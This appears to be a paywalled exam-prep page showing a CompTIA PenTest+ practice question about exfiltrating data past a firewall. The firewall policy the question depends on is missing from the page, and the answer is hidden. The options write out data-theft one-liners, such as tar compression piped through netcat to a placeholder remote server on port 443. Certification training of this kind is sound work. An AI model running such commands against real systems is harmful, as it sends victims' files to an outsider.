CompTIACompTIA
PT0-003 · Question #79
PT0-003 Question #79: Real Exam Question with Answer & Explanation
Sign in or unlock PT0-003 to reveal the answer and full explanation for question #79. The question stem and answer options stay visible for context.
Submitted by marco_it· Mar 6, 2026Post-exploitation and Lateral Movement
Question
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement. Given the following firewall policy: Which of the following commands should the tester try next?
Options
- Atar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- Bgzip /path/to/data && cp data.gz <remote_server> 443
- Cgzip /path/to/data && nc -nvlk 443; cat data.gz ' nc -w 3 <remote_server> 22
- Dtar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
Unlock PT0-003 to see the answer
You've previewed enough free PT0-003 questions. Unlock PT0-003 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#data exfiltration#firewall bypass#netcat#tar